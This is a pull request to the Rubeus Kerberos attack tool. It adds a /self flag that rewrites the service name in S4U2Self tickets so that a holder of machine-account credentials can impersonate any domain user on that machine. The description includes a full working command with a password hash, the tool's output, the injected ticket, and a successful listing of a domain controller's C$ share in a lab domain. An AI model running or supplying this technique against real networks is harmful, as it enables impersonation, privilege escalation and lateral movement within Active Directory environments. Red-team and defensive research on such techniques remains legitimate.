### PR TITLE
Adding support for modifying S4U2Self tickets to be able to impersona…

### DIFF
--- a/Rubeus/Commands/S4u.cs
+++ b/Rubeus/Commands/S4u.cs
@@ -23,6 +23,7 @@ namespace Rubeus.Commands
             string dc = "";
             string targetDomain = "";
             string targetDC = "";
+            bool self = false;
             Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial; // throwaway placeholder, changed to something valid
             KRB_CRED tgs = null;
 
@@ -93,6 +94,11 @@ namespace Rubeus.Commands
                 altSname = arguments["/altservice"];
             }
 
+            if (arguments.ContainsKey("/self"))
+            {
+                self = true;
+            }
+
             if (arguments.ContainsKey("/tgs"))
             {
                 string kirbi64 = arguments["/tgs"];
@@ -140,13 +146,13 @@ namespace Rubeus.Commands
                 {
                     byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC);
+                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC, self);
                 }
                 else if (File.Exists(kirbi64))
                 {
                     byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC);
+                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC, self);
                 }
                 else
                 {
@@ -166,7 +172,7 @@ namespace Rubeus.Commands
                     return;
                 }
 
-                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC);
+                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC, self);
                 return;
             }
             else


### PR DESCRIPTION
…te any user on the requesting machine

As described in Elad Shamir's Wagging the Dog post, in the section "Solving a Sensitive Problem", if you gain the ability to authenticate as a machine account, you can use S4U2Self to impersonate *any* user (even those protected from delegation) on the request machine account. You do this by requesting a S4U2Self and modifying the sname in the resulting ticket.

This modification makes Rubeus support this by adding a /self flag and using the already existing /altservice flag, if these are both used the sname specified in /altservice will be written to the resulting ticket. An example:

```
C:\temp>.\Rubeus.exe s4u /user:IDC1$ /domain:internal.zeroday.lab /impersonateuser:internal.admin /dc:idc1.internal.zeroday.lab /self /altservice:cifs/idc1.internal.zeroday.lab /nowrap /rc4:4fcd91552de50673c4494d2e57fca66a /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: S4U

[*] Using rc4_hmac hash: 4fcd91552de50673c4494d2e57fca66a
[*] Building AS-REQ (w/ preauth) for: 'internal.zeroday.lab\IDC1$'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFRDCCBUCgAwIB...b2RheS5sYWI=


[*] Action: S4U

[*] Using domain controller: idc1.internal.zeroday.lab (192.168.71.20)
[*] Building S4U2self request for: 'IDC1$@INTERNAL.ZERODAY.LAB'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Substituting alternative service name 'cifs/idc1.internal.zeroday.lab'
[*] Got a TGS for 'internal.admin@INTERNAL.ZERODAY.LAB' to 'cifs@INTERNAL.ZERODAY.LAB'
[*] base64(ticket.kirbi):

      doIGTjCCBkqgAw...bC56ZXJvZGF5LmxhYg==

[+] Ticket successfully imported!

C:\temp>klist

Current LogonId is 0:0x2822f

Cached Tickets: (1)

#0>     Client: internal.admin @ INTERNAL.ZERODAY.LAB
        Server: cifs/idc1.internal.zeroday.lab @ INTERNAL.ZERODAY.LAB
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0xa50000 -> renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 8/16/2020 12:46:01 (local)
        End Time:   8/16/2020 22:46:00 (local)
        Renew Time: 8/23/2020 12:46:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

C:\temp>dir \\idc1.internal.zeroday.lab\c$
 Volume in drive \\idc1.internal.zeroday.lab\c$ has no label.
 Volume Serial Number is FA70-59C0

 Directory of \\idc1.internal.zeroday.lab\c$

12/12/2019  19:29    <DIR>          PerfLogs
24/07/2020  14:20    <DIR>          Program Files
03/01/2020  13:57    <DIR>          Program Files (x86)
14/07/2020  21:16    <DIR>          temp
03/01/2020  13:36    <DIR>          tools
16/06/2020  19:32    <DIR>          Users
22/05/2020  11:41    <DIR>          Windows
               1 File(s)              6 bytes
               7 Dir(s)  87,270,170,624 bytes free
```

Nothing new here, just automating something Elad was doing manually in Wagging the Dog. As he mentions this could be used with machines configured for unconstrained delegation but also if you gain access to machine credentials or a TGT another way, if you gain access to a service account or something...